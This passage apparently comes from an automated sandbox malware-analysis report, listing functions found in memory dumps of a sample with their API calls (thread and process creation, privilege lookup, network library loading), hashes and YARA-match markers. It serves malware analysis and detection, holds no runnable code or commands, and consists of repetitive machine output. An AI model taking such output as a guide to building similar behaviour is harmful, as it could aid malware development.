Instruction Fuzzy Hash: 9B9002A134110442F500615D4554B060085D7F1345F51C125E1055554D9659DC527176

Uniqueness

Uniqueness Score: -1.00%

Function 049895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049895DA

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 784f3330e16386a3018de0e42d08da9f359a670b7c528601eb91878a93f29027
Instruction ID: 28e2c3c3fcfba19fa6fd6e56ab376d068654915ed41372e9dcdf59993dfb2d3f
Opcode Fuzzy Hash: 784f3330e16386a3018de0e42d08da9f359a670b7c528601eb91878a93f29027
Instruction Fuzzy Hash: 909002A1202100036505715D4554616408A97F0245B51C131E1005590DD565DC917175

Uniqueness

Uniqueness Score: -1.00%

Function 04989910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498991A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5d40c95ae8f8b2bd070e7f912dada86fbd0c67e29ed6c719586b262e01f2a16
Instruction ID: a19b9145739aeb32556554f531133bf8e025b5d16d7be67f133cd8d9e0094c83
Opcode Fuzzy Hash: b5d40c95ae8f8b2bd070e7f912dada86fbd0c67e29ed6c719586b262e01f2a16
Instruction Fuzzy Hash: E39002B120110402F540715D4544746008597E0345F51C121A5055554E9699DDD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 04989540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498954A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3443d72ddfe10255bedef86b9213bfdb22447b52283e03279b24ce15b852e77c
Instruction ID: 4cb74d8880f0839b026f3d07817d10c2c0700ea5a204bb5e9c58dbf364731218
Opcode Fuzzy Hash: 3443d72ddfe10255bedef86b9213bfdb22447b52283e03279b24ce15b852e77c
Instruction Fuzzy Hash: 0C900265211100032505A55D074450700C697E5395351C131F1006550CE661DC616171

Uniqueness

Uniqueness Score: -1.00%

Function 049896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049896DA

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d94c388eea0250089489893fece032081a28cbcda8eeeb50b339b035191b53d
Instruction ID: 57af7780ee0de2cc3c31616dbbdaa7aa5cbbc04cb931b700ca28c9f5f90d1409
Opcode Fuzzy Hash: 5d94c388eea0250089489893fece032081a28cbcda8eeeb50b339b035191b53d
Instruction Fuzzy Hash: 1890047130110C43F500715D4544F4700C5D7F0345F51C137F0115754DD755DC517571

Uniqueness

Uniqueness Score: -1.00%

Function 049896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049896EA

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36e4d1389237dc8ae412511f2c977de8ac108ed6447e1fa780bf0609b2f8a82b
Instruction ID: 80e817d3691d3b4c5b3ad78cb65815818cea2b9aac307e0ea83b6b6f2311a04a
Opcode Fuzzy Hash: 36e4d1389237dc8ae412511f2c977de8ac108ed6447e1fa780bf0609b2f8a82b
Instruction Fuzzy Hash: 2290027120118802F510615D854474A008597E0345F55C521A4415658D96D5DC917171

Uniqueness

Uniqueness Score: -1.00%

Function 04989650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498965A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a78934c03408171ed941fd7c11ce793b8fc55263a95d8ee900d658fa14a479ce
Instruction ID: e2bb5bfd8145ebff72eb2840a034ff87911ed720795e2e5d897a00967bc81676
Opcode Fuzzy Hash: a78934c03408171ed941fd7c11ce793b8fc55263a95d8ee900d658fa14a479ce
Instruction Fuzzy Hash: 3790027120514842F540715D4544A46009597E0349F51C121A0055694DA665DD55B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 04989A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04989A5A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 315314d3dd27cd4a5d207ca97237f1ad00bed1778d4262ac860803e5d0c265b1
Instruction ID: 1ef0771aec1f70750bbbefd3c4c5bb8f023a0d772060221f5cea8727820dea17
Opcode Fuzzy Hash: 315314d3dd27cd4a5d207ca97237f1ad00bed1778d4262ac860803e5d0c265b1
Instruction Fuzzy Hash: 4090026121190042F600656D4D54B07008597E0347F51C225A0145554CD955DC616571

Uniqueness

Uniqueness Score: -1.00%

Function 04989660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498966A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0df52dbfd33f92abae69cc054a5a11ab563bab68a7fc7ce82f5b5ce18c552889
Instruction ID: f660a30832912f0903b981cadd6816198de35df747ba7b93294ac19f52657812
Opcode Fuzzy Hash: 0df52dbfd33f92abae69cc054a5a11ab563bab68a7fc7ce82f5b5ce18c552889
Instruction Fuzzy Hash: E090027120110802F580715D454464A008597E1345F91C125A0016654DDA55DE5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 04989780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498978A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fab792c42803e822e548c115417ca6639a37de6997c16900fcbbb9c9b1010eda
Instruction ID: 9cfe02cabca5412a3df0c2779272fba7063486ea6083901114bfe7370d880a9a
Opcode Fuzzy Hash: fab792c42803e822e548c115417ca6639a37de6997c16900fcbbb9c9b1010eda
Instruction Fuzzy Hash: D090026921310002F580715D554860A008597E1246F91D525A0006558CD955DC696371

Uniqueness

Uniqueness Score: -1.00%

Function 04989FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04989FEA

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc2a83b790bd17f0f75b659f177201b40ef43ddd071bec58531b14de68c2def0
Instruction ID: 39e927564f87974379f269682edaa1095d7f5d9dd09fce331c437274f719438e
Opcode Fuzzy Hash: bc2a83b790bd17f0f75b659f177201b40ef43ddd071bec58531b14de68c2def0
Instruction Fuzzy Hash: 8990027131124402F510615D8544706008597E1245F51C521A0815558D96D5DC917172

Uniqueness

Uniqueness Score: -1.00%

Function 04989710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498971A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e27bf489b5caa272b3af85f1f26c6361fe1d57dd54961092972c4e918ac4a604
Instruction ID: eb1a14e8f273fbc216ef29f8b3810a37e4879fdbe382e0680c2bfbb3ac7f02f1
Opcode Fuzzy Hash: e27bf489b5caa272b3af85f1f26c6361fe1d57dd54961092972c4e918ac4a604
Instruction Fuzzy Hash: A290027120110402F500659D5548646008597F0345F51D121A5015555ED6A5DC917171

Uniqueness

Uniqueness Score: -1.00%

Function 008F7206, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008F72DB

Strings

3333, xrefs: 008F721E

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: 2c4b98fd0efac57849c2cf9f0068a493a9ce8c4e0e4622be213cb6dcc0ab87d5
Instruction ID: c0b05c6547e7f484c78c5d252e0edfe9113de6bbed4f301c995da515e0d4b035
Opcode Fuzzy Hash: 2c4b98fd0efac57849c2cf9f0068a493a9ce8c4e0e4622be213cb6dcc0ab87d5
Instruction Fuzzy Hash: 44112B31A4425C3FFB245B789C02FBE3798EF41720F088069FF09EE2C2D5A5A90146E6

Uniqueness

Uniqueness Score: -1.00%

Function 00906EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00906F88

Strings

wininet.dll, xrefs: 00906F3E, 00906F47
net.dll, xrefs: 00906F51, 00906FD7, 00906FAF, 00906FBB, 00906FE3

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction ID: fbdc17df68f90d55920253a291214d4b59fc7bd36114b0f969cb1323579f92f0
Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction Fuzzy Hash: 1A31CFB2602705BFC721DF68D8A1FA7B7B8FB88700F00841DF65A9B281D770A455CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00906ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00906F88

Strings

wininet.dll, xrefs: 00906F3E, 00906F47
net.dll, xrefs: 00906F51, 00906FAF, 00906FBB

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: baa48fe1bdc84db6eead1d8a51711b0167437dd17a0321ac33398a7c042f127b
Instruction ID: 607bf1e837851fc8797cd69a2c2363d5af4fb706b75697167311f6503b30c94d
Opcode Fuzzy Hash: baa48fe1bdc84db6eead1d8a51711b0167437dd17a0321ac33398a7c042f127b
Instruction Fuzzy Hash: 0021C1B1A01305AFD714DF68D8A1FA7B7B8BB88300F00802DF6199B282D774A455CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00907003, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008FCCD0,?,?), ref: 0090704C

Strings

net.dll, xrefs: 00906FBB

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID: net.dll
API String ID: 2422867632-2431746569
Opcode ID: faa6e115a1e756ae437118e39322d2b8af787029f32d7de6143e99a4db7fb875
Instruction ID: 361617640161b31463e8e1121bea002a640c658cf6f476bf64b1bdc22cf01cf0
Opcode Fuzzy Hash: faa6e115a1e756ae437118e39322d2b8af787029f32d7de6143e99a4db7fb875
Instruction Fuzzy Hash: E8012B722453403ED7312A689C02FA7BB6CDBC6720F54009DFA499F1C2D6A5A85683A5

Uniqueness

Uniqueness Score: -1.00%

Function 009084C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,008F3B93), ref: 009084FD

Strings

.z`, xrefs: 009084EC, 009084F8

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: d76122ef33f1e3306d999abb6c53e848cb80a1c971f38c679a468582582ef88a
Instruction ID: 2113ec19fae82288d45d0e0c375fe5a9e686ed6530df05ad0efd288e03d8123b
Opcode Fuzzy Hash: d76122ef33f1e3306d999abb6c53e848cb80a1c971f38c679a468582582ef88a
Instruction Fuzzy Hash: 09F012756006146FCB14EF54DC45D97776CEF84750F114595FD585B282D930ED108BF0

Uniqueness

Uniqueness Score: -1.00%

Function 009084D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,008F3B93), ref: 009084FD

Strings

.z`, xrefs: 009084EC, 009084F8

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 765c3ff24c47df14bf237607178050ff6a4a56fce7a22dc23d841c889f7097b5
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: A9E04FB1200204AFD714DF59CC49EA777ACEF88750F014554FD0857281CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 008F7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008F72DB

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 7833237e2a725f2a72004289a03e32b62f7338d16666d76355909a0a9d4b724d
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: F3016731A8022C7BE721A6A49C43FFE776CAB40B51F554115FF04FA1C1E6E4690647F6

Uniqueness

Uniqueness Score: -1.00%

Function 008F72E4, Relevance: 3.1, APIs: 2, Instructions: 52threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008F72DB

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: efb9424badbddd0b796ec810e42f20a93da0309edf016d4cbe1bbf3c94b83781
Instruction ID: 25c703f75fc5ce017d7fa7860ddc3ee1c3daebaafaf1d59d7f2c76e312b0bb9b
Opcode Fuzzy Hash: efb9424badbddd0b796ec810e42f20a93da0309edf016d4cbe1bbf3c94b83781
Instruction Fuzzy Hash: 5E01D631A8022C7AEB21A6A49C03FFE732CAB44B51F150119FF04FA1C1E6E46A0647F5

Uniqueness

Uniqueness Score: -1.00%

Function 00908665, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,008FCFA2,008FCFA2,?,00000000,?,?), ref: 00908660

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ebf282a5e96b5e9508eb95cc7a8ce4d329e0a0f557ca4730d0e4e771f5569573
Instruction ID: 5627fe626cb5aa4a92788662854a7a9f5ffbdc4d30f17f5060dad90b487d4ee0
Opcode Fuzzy Hash: ebf282a5e96b5e9508eb95cc7a8ce4d329e0a0f557ca4730d0e4e771f5569573
Instruction Fuzzy Hash: F5213BB2200208AFDB24DF58DC45EE737ADEF88750F118559FA4CAB681DA31E9118BE4

Uniqueness

Uniqueness Score: -1.00%

Function 0090862A, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,008FCFA2,008FCFA2,?,00000000,?,?), ref: 00908660

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8880956cb1e377bb44f717483bb6a2da5c1941628db4645a088a31a4d1d5e708
Instruction ID: 344df1c7aa47efaa2439a53f8b95ee0eb99398459afe9693b72c32f2e111bd3f
Opcode Fuzzy Hash: 8880956cb1e377bb44f717483bb6a2da5c1941628db4645a088a31a4d1d5e708
Instruction Fuzzy Hash: A21117B5200209AFCB14DF98DC85EEB77A9AF88750F018559FA499B281DA30E9118BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00908508, Relevance: 1.6, APIs: 1, Instructions: 50processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00908594

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 04f770befa9187abc80275c547943163b49c69b710011fca46b58322d0861d0c
Instruction ID: c17eb673ad6ff97ab880c1baa07b67330ecd638d1f9fcd9e03dc0bf8c7d82b2e
Opcode Fuzzy Hash: 04f770befa9187abc80275c547943163b49c69b710011fca46b58322d0861d0c
Instruction Fuzzy Hash: 57011AB2214508AFDB14DF98DC84DE777ADEF9C650F018659FA4C97241D630E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 008F9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 008F9B92

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f514a49f5137881b843707c425739773b96794aef5de9b17384879636d38914e
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 7A01E5B5D4020DBBDF10DBE5EC52F9DB778AB54304F004195EA0897181F671EB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00908540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00908594

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 7291f62b3a73e8e0b8aefb95a7246a872396700ac260e69c11554c1bd1c103a8
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 6201AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97281CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00907010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008FCCD0,?,?), ref: 0090704C

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction ID: bdd4f2fdcfe26349838791c989be9d0fe73c8b40d18fdd9459e5f17ce9496c29
Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction Fuzzy Hash: 89E06D333912043AE23065999C02FA7B39C8B81B30F540126FA0DEA2C1D995F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 00908456, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00903516,?,00903C8F,00903C8F,?,00903516,?,?,?,?,?,00000000,00000000,?), ref: 009084BD

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94075a695fde84f36b382f1a81a44b3fe54b45202eae7ff26726eb5cb16a7f55
Instruction ID: 13707f1a9db6d6cf03b03f7d207d4eea096df9ab8b5f5f51a5eb7335ade95897
Opcode Fuzzy Hash: 94075a695fde84f36b382f1a81a44b3fe54b45202eae7ff26726eb5cb16a7f55
Instruction Fuzzy Hash: 6AF0A072304215AFD728EF84DC89EE7776DEF84350F018599FA885B291DA32EA14C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 008FD407, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,008F7C63,?), ref: 008FD43B

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7f030648fedbd1fb2b8043e149b278b72c51645f2ad9398712b35c81f30e7580
Instruction ID: c63598abee76b0dd6fb35dfa311518d5602996f9504c9a15dc59452ac78f64d1
Opcode Fuzzy Hash: 7f030648fedbd1fb2b8043e149b278b72c51645f2ad9398712b35c81f30e7580
Instruction Fuzzy Hash: 97E020357602082BD710EAB89C03F763788A764310F444199FA4DD73C3D551D4014551

Uniqueness

Uniqueness Score: -1.00%

Function 00908490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00903516,?,00903C8F,00903C8F,?,00903516,?,?,?,?,?,00000000,00000000,?), ref: 009084BD

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 9b04f6ac83149417484f914293d86b4ab1b339b9ec48f875c20882163ed85753
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: B1E012B1200208ABDB14EF99CC45EA777ACAF88650F118558FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00908630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,008FCFA2,008FCFA2,?,00000000,?,?), ref: 00908660

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: d616c0afef9bbc7355bfa367ad38973f4c8d89e9e2964260bf873c0d3347e2fb
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 6FE01AB1200208ABDB10DF49CC85EE737ADAF88650F018554FA0857281C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 008FD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,008F7C63,?), ref: 008FD43B

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 4bc647083ca697eca9d316e1995d6a73f67d3f40632ea50fa37d0baf184c557d
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 3CD0A7727503083BE610FBE8DC07F2632CDAB54B00F494064FA49D73C3D960F5004565

Uniqueness

Uniqueness Score: -1.00%

Function 0498967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04989694

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 905182f7530851087907a7f1d21239fc92ad91e07bdd107084d975ba422ab8ca
Instruction ID: 48c5eb3bc173b853fe25c812a87b737a68f12612bd63735f9b4b45b6e20c3d55
Opcode Fuzzy Hash: 905182f7530851087907a7f1d21239fc92ad91e07bdd107084d975ba422ab8ca
Instruction Fuzzy Hash: DEB09BB19015C5C5FB11E7644708737794477D0745F16C175D1021641A4778D491F5B5

Uniqueness

